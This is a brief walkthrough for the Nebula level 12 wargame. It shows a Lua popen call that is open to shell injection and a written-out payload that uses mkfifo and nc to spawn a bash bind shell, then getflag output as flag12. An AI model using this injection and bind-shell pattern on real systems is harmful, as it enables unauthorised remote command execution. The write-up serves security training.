# How to solve Nebula 12

This excercise is pretty easy. The password hash is calculated by passing a user controlled string to ``sha1sum``

```
prog = io.popen("echo "..password.." | sha1sum", "r")
```

So let's inject some remote shell spawning code.

```
echo " dum ; mkfifo /tmp/pipe; nc -lk 4201 0</tmp/pipe | /bin/bash &>/tmp/pipe; echo dum " | nc localhost 50001
```

On a second shell logged in with *level12* we can connect to this shell

```
level12@nebula:~$ nc localhost 4201
getflag
You have successfully executed getflag on a target account
id
uid=987(flag12) gid=987(flag12) groups=987(flag12)
```